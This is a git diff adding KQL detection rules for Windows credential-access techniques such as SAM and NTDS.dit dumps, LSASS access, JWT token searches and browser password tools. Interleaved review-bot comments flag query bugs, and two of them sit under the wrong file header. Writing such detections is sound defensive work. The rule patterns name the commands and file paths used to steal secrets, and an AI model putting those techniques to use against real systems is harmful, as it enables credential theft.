+| where (((ProcessCommandLine contains " -u -p " and ProcessCommandLine contains " -ip " and ProcessCommandLine contains " -s ") and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) and (FolderPath endswith "\\Werfault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe")) and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lsass.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/potential_network_sniffing_activity_using_network_tools.kql b/KQL/rules/Credential Access/potential_network_sniffing_activity_using_network_tools.kql
new file mode 100644
index 00000000..f652df5b
--- /dev/null
+++ b/KQL/rules/Credential Access/potential_network_sniffing_activity_using_network_tools.kql
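Review bot: The `InitiatingProcessAccountName contains "AUTHORI"` and `AccountName contains "AUTHORI"` checks will not match if, as in the Defender for Endpoint schema, the `*AccountName` columns carry only the user part (e.g. `system`) while the domain (`nt authority`) lives in `AccountDomain` / `InitiatingProcessAccountDomain`; in that case this high-severity rule never fires. Verify against real DeviceProcessEvents rows and, if confirmed, match on the domain columns instead, e.g. `InitiatingProcessAccountDomain contains "AUTHORI"` and `AccountDomain contains "AUTHORI"`, keeping the `AUTORI` variants alongside.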
@@ -0,0 +1,15 @@
+// Title: Potential Network Sniffing Activity Using Network Tools
+// Author: Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-21
+// Level: medium
+// Description: Detects potential network sniffing via use of network tools such as "tshark", "windump".
+Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.
+An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
+
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.discovery, attack.t1040
+// False Positives:
+// - Legitimate administration activity to troubleshoot network issues
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-i" and FolderPath endswith "\\tshark.exe") or FolderPath endswith "\\windump.exe"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/potential_powershell_console_history_access_attempt_via_history_file.kql b/KQL/rules/Credential Access/potential_powershell_console_history_access_attempt_via_history_file.kql
new file mode 100644
index 00000000..4f3ce6af
--- /dev/null
+++ b/KQL/rules/Credential Access/potential_powershell_console_history_access_attempt_via_history_file.kql
@@ -0,0 +1,14 @@
+// Title: Potential PowerShell Console History Access Attempt via History File
+// Author: Luc Génaux
+// Date: 2025-04-03
+// Level: medium
+// Description: Detects potential access attempts to the PowerShell console history directly via history file (ConsoleHost_history.txt).
+This can give access to plaintext passwords used in PowerShell commands or used for general reconnaissance.
+
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.001
+// False Positives:
+// - Legitimate access of the console history file is possible
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "ConsoleHost_history.txt" or ProcessCommandLine contains "(Get-PSReadLineOption).HistorySavePath"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/potential_reconnaissance_for_cached_credentials_via_cmdkey_exe.kql b/KQL/rules/Credential Access/potential_reconnaissance_for_cached_credentials_via_cmdkey_exe.kql
new file mode 100644
index 00000000..ed96ee5e
--- /dev/null
+++ b/KQL/rules/Credential Access/potential_reconnaissance_for_cached_credentials_via_cmdkey_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE
+// Author: jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-01-16
+// Level: high
+// Description: Detects usage of cmdkey to look for cached credentials on the system
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.005
+// False Positives:
+// - Legitimate administrative tasks
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -l" or ProcessCommandLine contains " /l" or ProcessCommandLine contains " –l" or ProcessCommandLine contains " —l" or ProcessCommandLine contains " ―l") and (FolderPath endswith "\\cmdkey.exe" or ProcessVersionInfoOriginalFileName =~ "cmdkey.exe")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/potential_sam_database_dump.kql b/KQL/rules/Credential Access/potential_sam_database_dump.kql
new file mode 100644
index 00000000..1a870e9b
--- /dev/null
+++ b/KQL/rules/Credential Access/potential_sam_database_dump.kql
@@ -0,0 +1,12 @@
+// Title: Potential SAM Database Dump
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-11
+// Level: high
+// Description: Detects the creation of files that look like exports of the local SAM (Security Account Manager)
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002
+// False Positives:
+// - Rare cases of administrative activity
+
+DeviceFileEvents
+| where (FolderPath endswith "\\Temp\\sam" or FolderPath endswith "\\sam.sav" or FolderPath endswith "\\Intel\\sam" or FolderPath endswith "\\sam.hive" or FolderPath endswith "\\Perflogs\\sam" or FolderPath endswith "\\ProgramData\\sam" or FolderPath endswith "\\Users\\Public\\sam" or FolderPath endswith "\\AppData\\Local\\sam" or FolderPath endswith "\\AppData\\Roaming\\sam" or FolderPath endswith "_ShadowSteal.zip" or FolderPath endswith "\\Documents\\SAM.export" or FolderPath endswith ":\\sam") or (FolderPath contains "\\hive_sam_" or FolderPath contains "\\sam.save" or FolderPath contains "\\sam.export" or FolderPath contains "\\~reg_sam.save" or FolderPath contains "\\sam_backup" or FolderPath contains "\\sam.bck" or FolderPath contains "\\sam.backup")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/potential_spn_enumeration_via_setspn_exe.kql b/KQL/rules/Credential Access/potential_spn_enumeration_via_setspn_exe.kql
new file mode 100644
index 00000000..677efffa
--- /dev/null
+++ b/KQL/rules/Credential Access/potential_spn_enumeration_via_setspn_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential SPN Enumeration Via Setspn.EXE
+// Author: Markus Neis, keepwatch
+// Date: 2018-11-14
+// Level: medium
+// Description: Detects service principal name (SPN) enumeration used for Kerberoasting
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1558.003
+// False Positives:
+// - Administration activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -q " or ProcessCommandLine contains " /q ") and (FolderPath endswith "\\setspn.exe" or ProcessVersionInfoOriginalFileName =~ "setspn.exe" or (ProcessVersionInfoFileDescription contains "Query or reset the computer" and ProcessVersionInfoFileDescription contains "SPN attribute"))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql b/KQL/rules/Credential Access/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql
new file mode 100644
index 00000000..af3aa6ba
--- /dev/null
+++ b/KQL/rules/Credential Access/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql
@@ -0,0 +1,12 @@
+// Title: Potential Windows Defender AV Bypass Via Dump64.EXE Rename
+// Author: Austin Songer @austinsonger, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-11-26
+// Level: high
+// Description: Detects when a user is potentially trying to bypass the Windows Defender AV by renaming a tool to dump64.exe and placing it in the Visual Studio folder.
+Currently the rule is covering only usage of procdump but other utilities can be added in order to increase coverage.
+
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+
+DeviceProcessEvents
+| where (FolderPath contains "\\Microsoft Visual Studio\\" and FolderPath endswith "\\dump64.exe" and FolderPath startswith ":\\Program Files") and (ProcessVersionInfoOriginalFileName =~ "procdump" or (ProcessCommandLine contains " -ma " or ProcessCommandLine contains " -mp "))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/potentially_suspicious_command_targeting_teams_sensitive_files.kql b/KQL/rules/Credential Access/potentially_suspicious_command_targeting_teams_sensitive_files.kql
new file mode 100644
index 00000000..f2753d96
--- /dev/null
+++ b/KQL/rules/Credential Access/potentially_suspicious_command_targeting_teams_sensitive_files.kql
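Review bot: `FolderPath startswith ":\\Program Files"` cannot match, because FolderPath in DeviceProcessEvents begins with the drive letter (`C:\...`), so the first AND-group is always false and the rule never fires. Use `FolderPath contains ":\\Program Files"` (which also covers `Program Files (x86)`), or drop the condition, since the `\\Microsoft Visual Studio\\` and `\\dump64.exe` checks already constrain the path.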
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious Command Targeting Teams Sensitive Files
+// Author: @SerkinValery
+// Date: 2022-09-16
+// Level: medium
+// Description: Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams.
+The database might contain authentication tokens and other sensitive information about the logged in accounts.
+
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1528
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\Microsoft\\Teams\\Cookies" or ProcessCommandLine contains "\\Microsoft\\Teams\\Local Storage\\leveldb") and (not(FolderPath endswith "\\Microsoft\\Teams\\current\\Teams.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql b/KQL/rules/Credential Access/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql
new file mode 100644
index 00000000..3bec20e7
--- /dev/null
+++ b/KQL/rules/Credential Access/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql
@@ -0,0 +1,14 @@
+// Title: Potentially Suspicious EventLog Recon Activity Using Log Query Utilities
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2022-09-09
+// Level: medium
+// Description: Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs.
+This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc.
+
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.discovery, attack.t1552
+// False Positives:
+// - Legitimate usage of the utility by administrators to query the event log
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains "-InstanceId 462") or (ProcessCommandLine contains ".eventid -eq 462") or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "462") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "462") or (ProcessCommandLine contains "System[EventID=462" and ProcessCommandLine contains "]") or ProcessCommandLine contains "-InstanceId 4778" or ProcessCommandLine contains ".eventid -eq 4778" or ProcessCommandLine contains "System[EventID=4778]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "4778") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "4778") or ProcessCommandLine contains "-InstanceId 25" or ProcessCommandLine contains ".eventid -eq 25" or ProcessCommandLine contains "System[EventID=25]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "25") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "25")) or (ProcessCommandLine contains "Microsoft-Windows-PowerShell" or ProcessCommandLine contains "Microsoft-Windows-Security-Auditing" or ProcessCommandLine contains "Microsoft-Windows-TerminalServices-LocalSessionManager" or ProcessCommandLine contains "Microsoft-Windows-TerminalServices-RemoteConnectionManager" or ProcessCommandLine contains "Microsoft-Windows-Windows Defender" or ProcessCommandLine contains "PowerShellCore" or ProcessCommandLine contains "Security" or ProcessCommandLine contains "Windows PowerShell")) and ((ProcessCommandLine contains "Select" and ProcessCommandLine contains "Win32_NTLogEvent") or ((ProcessCommandLine contains " qe " or ProcessCommandLine contains " query-events ") and (FolderPath endswith "\\wevtutil.exe" or ProcessVersionInfoOriginalFileName =~ "wevtutil.exe")) or (ProcessCommandLine contains " ntevent" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) or (ProcessCommandLine contains "Get-WinEvent " or ProcessCommandLine contains "get-eventlog "))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/potentially_suspicious_jwt_token_search_via_cli.kql b/KQL/rules/Credential Access/potentially_suspicious_jwt_token_search_via_cli.kql
new file mode 100644
index 00000000..1d8585e5
--- /dev/null
+++ b/KQL/rules/Credential Access/potentially_suspicious_jwt_token_search_via_cli.kql
@@ -0,0 +1,13 @@
+// Title: Potentially Suspicious JWT Token Search Via CLI
+// Author: Nasreddine Bencherchali (Nextron Systems), kagebunsher
+// Date: 2022-10-25
+// Level: medium
+// Description: Detects potentially suspicious search for JWT tokens via CLI by looking for the string "eyJ0eX" or "eyJhbG".
+JWT tokens are often used for access-tokens across various applications and services like Microsoft 365, Azure, AWS, Google Cloud, and others.
+Threat actors may search for these tokens to steal them for lateral movement or privilege escalation.
+
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1528, attack.t1552.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "eyJ0eXAiOi" or ProcessCommandLine contains "eyJhbGciOi" or ProcessCommandLine contains " eyJ0eX" or ProcessCommandLine contains " \"eyJ0eX\"" or ProcessCommandLine contains " 'eyJ0eX'" or ProcessCommandLine contains " eyJhbG" or ProcessCommandLine contains " \"eyJhbG\"" or ProcessCommandLine contains " 'eyJhbG'") and (ProcessCommandLine contains "find " or ProcessCommandLine contains "find.exe" or ProcessCommandLine contains "findstr" or ProcessCommandLine contains "select-string " or ProcessCommandLine contains "strings")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/potentially_suspicious_odbc_driver_registered.kql b/KQL/rules/Credential Access/potentially_suspicious_odbc_driver_registered.kql
new file mode 100644
index 00000000..aebafd8b
--- /dev/null
+++ b/KQL/rules/Credential Access/potentially_suspicious_odbc_driver_registered.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious ODBC Driver Registered
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-23
+// Level: high
+// Description: Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.persistence, attack.t1003
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where (RegistryValueData contains ":\\PerfLogs\\" or RegistryValueData contains ":\\ProgramData\\" or RegistryValueData contains ":\\Temp\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Registration\\CRMLog" or RegistryValueData contains ":\\Windows\\System32\\com\\dmp\\" or RegistryValueData contains ":\\Windows\\System32\\FxsTmp\\" or RegistryValueData contains ":\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\" or RegistryValueData contains ":\\Windows\\System32\\spool\\drivers\\color\\" or RegistryValueData contains ":\\Windows\\System32\\spool\\PRINTERS\\" or RegistryValueData contains ":\\Windows\\System32\\spool\\SERVERS\\" or RegistryValueData contains ":\\Windows\\System32\\Tasks_Migrated\\" or RegistryValueData contains ":\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\com\\dmp\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\FxsTmp\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or RegistryValueData contains ":\\Windows\\Tasks\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains ":\\Windows\\Tracing\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\AppData\\Roaming\\") and RegistryKey endswith "\\SOFTWARE\\ODBC\\ODBCINST.INI*" and (RegistryKey endswith "\\Driver" or RegistryKey endswith "\\Setup")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/powershell_get_process_lsass.kql b/KQL/rules/Credential Access/powershell_get_process_lsass.kql
new file mode 100644
index 00000000..75596c70
--- /dev/null
+++ b/KQL/rules/Credential Access/powershell_get_process_lsass.kql
@@ -0,0 +1,10 @@
+// Title: PowerShell Get-Process LSASS
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-04-23
+// Level: high
+// Description: Detects a "Get-Process" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.004
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Get-Process lsas" or ProcessCommandLine contains "ps lsas" or ProcessCommandLine contains "gps lsas"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/powershell_sam_copy.kql b/KQL/rules/Credential Access/powershell_sam_copy.kql
new file mode 100644
index 00000000..5400fcef
--- /dev/null
+++ b/KQL/rules/Credential Access/powershell_sam_copy.kql
@@ -0,0 +1,13 @@
+// Title: PowerShell SAM Copy
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-07-29
+// Level: high
+// Description: Detects suspicious PowerShell scripts accessing SAM hives
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002
+// False Positives:
+// - Some rare backup scenarios
+// - PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\HarddiskVolumeShadowCopy" and ProcessCommandLine contains "System32\\config\\sam") and (ProcessCommandLine contains "Copy-Item" or ProcessCommandLine contains "cp $_." or ProcessCommandLine contains "cpi $_." or ProcessCommandLine contains "copy $_." or ProcessCommandLine contains ".File]::Copy(")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/private_keys_reconnaissance_via_commandline_tools.kql b/KQL/rules/Credential Access/private_keys_reconnaissance_via_commandline_tools.kql
new file mode 100644
index 00000000..f8744d66
--- /dev/null
+++ b/KQL/rules/Credential Access/private_keys_reconnaissance_via_commandline_tools.kql
@@ -0,0 +1,10 @@
+// Title: Private Keys Reconnaissance Via CommandLine Tools
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-07-20
+// Level: medium
+// Description: Adversaries may search for private key certificate files on compromised systems for insecurely stored credential
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.004
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".key" or ProcessCommandLine contains ".pgp" or ProcessCommandLine contains ".gpg" or ProcessCommandLine contains ".ppk" or ProcessCommandLine contains ".p12" or ProcessCommandLine contains ".pem" or ProcessCommandLine contains ".pfx" or ProcessCommandLine contains ".cer" or ProcessCommandLine contains ".p7b" or ProcessCommandLine contains ".asc") and ((ProcessCommandLine contains "dir " and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) or (ProcessCommandLine contains "Get-ChildItem " and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))) or (FolderPath endswith "\\findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE"))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/process_memory_dump_via_rdrleakdiag_exe.kql b/KQL/rules/Credential Access/process_memory_dump_via_rdrleakdiag_exe.kql
new file mode 100644
index 00000000..5ae8bf20
--- /dev/null
+++ b/KQL/rules/Credential Access/process_memory_dump_via_rdrleakdiag_exe.kql
@@ -0,0 +1,12 @@
+// Title: Process Memory Dump via RdrLeakDiag.EXE
+// Author: Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-09-24
+// Level: high
+// Description: Detects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-memdmp" or ProcessCommandLine contains "/memdmp" or ProcessCommandLine contains "–memdmp" or ProcessCommandLine contains "—memdmp" or ProcessCommandLine contains "―memdmp" or ProcessCommandLine contains "fullmemdmp") and (ProcessCommandLine contains " -o " or ProcessCommandLine contains " /o " or ProcessCommandLine contains " –o " or ProcessCommandLine contains " —o " or ProcessCommandLine contains " ―o " or ProcessCommandLine contains " -p " or ProcessCommandLine contains " /p " or ProcessCommandLine contains " –p " or ProcessCommandLine contains " —p " or ProcessCommandLine contains " ―p ") and (FolderPath endswith "\\rdrleakdiag.exe" or ProcessVersionInfoOriginalFileName =~ "RdrLeakDiag.exe")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/pua_dit_snapshot_viewer.kql b/KQL/rules/Credential Access/pua_dit_snapshot_viewer.kql
new file mode 100644
index 00000000..04b58745
--- /dev/null
+++ b/KQL/rules/Credential Access/pua_dit_snapshot_viewer.kql
@@ -0,0 +1,12 @@
+// Title: PUA - DIT Snapshot Viewer
+// Author: Furkan Caliskan (@caliskanfurkan_)
+// Date: 2020-07-04
+// Level: high
+// Description: Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.003
+// False Positives:
+// - Legitimate admin usage
+
+DeviceProcessEvents
+| where FolderPath endswith "\\ditsnap.exe" or ProcessCommandLine contains "ditsnap.exe"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/pua_mouse_lock_execution.kql b/KQL/rules/Credential Access/pua_mouse_lock_execution.kql
new file mode 100644
index 00000000..a438a4e9
--- /dev/null
+++ b/KQL/rules/Credential Access/pua_mouse_lock_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - Mouse Lock Execution
+// Author: Cian Heasley
+// Date: 2020-08-13
+// Level: medium
+// Description: In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool "Mouse Lock" as being used for both credential access and collection in security incidents.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.collection, attack.t1056.002
+// False Positives:
+// - Legitimate uses of Mouse Lock software
+
+DeviceProcessEvents
+| where ProcessVersionInfoProductName contains "Mouse Lock" or ProcessVersionInfoCompanyName contains "Misc314" or ProcessCommandLine contains "Mouse Lock_"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/pua_webbrowserpassview_execution.kql b/KQL/rules/Credential Access/pua_webbrowserpassview_execution.kql
new file mode 100644
index 00000000..8dfa441e
--- /dev/null
+++ b/KQL/rules/Credential Access/pua_webbrowserpassview_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - WebBrowserPassView Execution
+// Author: frack113
+// Date: 2022-08-20
+// Level: medium
+// Description: Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555.003
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
+| where ProcessVersionInfoFileDescription =~ "Web Browser Password Viewer" or FolderPath endswith "\\WebBrowserPassView.exe"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/registry_export_of_third_party_credentials.kql b/KQL/rules/Credential Access/registry_export_of_third_party_credentials.kql
new file mode 100644
index 00000000..a14e467d
--- /dev/null
+++ b/KQL/rules/Credential Access/registry_export_of_third_party_credentials.kql
@@ -0,0 +1,12 @@
+// Title: Registry Export of Third-Party Credentials
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-05-22
+// Level: high
+// Description: Detects the use of reg.exe to export registry paths associated with third-party credentials.
+Credential stealers have been known to use this technique to extract sensitive information from the registry.
+
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.002
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\Software\\Aerofox\\Foxmail\\V3.1" or ProcessCommandLine contains "\\Software\\Aerofox\\FoxmailPreview" or ProcessCommandLine contains "\\Software\\DownloadManager\\Passwords" or ProcessCommandLine contains "\\Software\\FTPWare\\COREFTP\\Sites" or ProcessCommandLine contains "\\Software\\IncrediMail\\Identities" or ProcessCommandLine contains "\\Software\\Martin Prikryl\\WinSCP 2\\Sessions" or ProcessCommandLine contains "\\Software\\Mobatek\\MobaXterm" or ProcessCommandLine contains "\\Software\\OpenSSH\\Agent\\Keys" or ProcessCommandLine contains "\\Software\\OpenVPN-GUI\\configs" or ProcessCommandLine contains "\\Software\\ORL\\WinVNC3\\Password" or ProcessCommandLine contains "\\Software\\Qualcomm\\Eudora\\CommandLine" or ProcessCommandLine contains "\\Software\\RealVNC\\WinVNC4" or ProcessCommandLine contains "\\Software\\RimArts\\B2\\Settings" or ProcessCommandLine contains "\\Software\\SimonTatham\\PuTTY\\Sessions" or ProcessCommandLine contains "\\Software\\SimonTatham\\PuTTY\\SshHostKeys" or ProcessCommandLine contains "\\Software\\Sota\\FFFTP" or ProcessCommandLine contains "\\Software\\TightVNC\\Server" or ProcessCommandLine contains "\\Software\\WOW6432Node\\Radmin\\v3.0\\Server\\Parameters\\Radmin") and (ProcessCommandLine contains "save" or ProcessCommandLine contains "export") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
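Review bot: The second line of the Description, `Credential stealers have been known to use this technique to extract sensitive information from the registry.`, is emitted without the `//` prefix, so it lands in the .kql file as a bare statement rather than a comment and the query will not parse as written. The same spill appears in sensitive_file_dump_via_wbadmin_exe.kql, sensitive_file_recovery_from_backup_via_wbadmin_exe.kql and suspicious_file_access_to_browser_credential_storage.kql, where every continuation line of a multi-line description loses its prefix. Since these files are generated, the fix belongs in the converter: prefix each continuation, `// Credential stealers have been known to use this technique to extract sensitive information from the registry.`, or fold the description onto the single `// Description:` line.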
diff --git a/KQL/rules/Credential Access/renamed_browsercore_exe_execution.kql b/KQL/rules/Credential Access/renamed_browsercore_exe_execution.kql
new file mode 100644
index 00000000..ef376f0c
--- /dev/null
+++ b/KQL/rules/Credential Access/renamed_browsercore_exe_execution.kql
@@ -0,0 +1,10 @@
+// Title: Renamed BrowserCore.EXE Execution
+// Author: Max Altgelt (Nextron Systems)
+// Date: 2022-06-02
+// Level: high
+// Description: Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.defense-evasion, attack.t1528, attack.t1036.003
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "BrowserCore.exe" and (not(FolderPath endswith "\\BrowserCore.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/sensitive_file_dump_via_wbadmin_exe.kql b/KQL/rules/Credential Access/sensitive_file_dump_via_wbadmin_exe.kql
new file mode 100644
index 00000000..6938ed3d
--- /dev/null
+++ b/KQL/rules/Credential Access/sensitive_file_dump_via_wbadmin_exe.kql
@@ -0,0 +1,14 @@
+// Title: Sensitive File Dump Via Wbadmin.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2024-05-10
+// Level: high
+// Description: Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive.
+Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.
+
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.003
+// False Positives:
+// - Legitimate backup operation by authorized administrators. Matches must be investigated and allowed on a case by case basis.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "start" or ProcessCommandLine contains "backup") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE") and (ProcessCommandLine contains "\\config\\SAM" or ProcessCommandLine contains "\\config\\SECURITY" or ProcessCommandLine contains "\\config\\SYSTEM" or ProcessCommandLine contains "\\Windows\\NTDS\\NTDS.dit")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql b/KQL/rules/Credential Access/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql
new file mode 100644
index 00000000..4a8e9c75
--- /dev/null
+++ b/KQL/rules/Credential Access/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql
@@ -0,0 +1,12 @@
+// Title: Sensitive File Recovery From Backup Via Wbadmin.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2024-05-10
+// Level: high
+// Description: Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive.
+Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.
+
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.003
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "\\config\\SAM" or ProcessCommandLine contains "\\config\\SECURITY" or ProcessCommandLine contains "\\config\\SYSTEM" or ProcessCommandLine contains "\\Windows\\NTDS\\NTDS.dit") and (ProcessCommandLine contains " recovery" and ProcessCommandLine contains "recoveryTarget" and ProcessCommandLine contains "itemtype:File")) and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/shadow_copies_creation_using_operating_systems_utilities.kql b/KQL/rules/Credential Access/shadow_copies_creation_using_operating_systems_utilities.kql
new file mode 100644
index 00000000..8013e5e0
--- /dev/null
+++ b/KQL/rules/Credential Access/shadow_copies_creation_using_operating_systems_utilities.kql
@@ -0,0 +1,12 @@
+// Title: Shadow Copies Creation Using Operating Systems Utilities
+// Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
+// Date: 2019-10-22
+// Level: medium
+// Description: Shadow Copies creation using operating systems utilities, possible credential access
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003, attack.t1003.002, attack.t1003.003
+// False Positives:
+// - Legitimate administrator working with shadow copies, access for backup purposes
+
+DeviceProcessEvents
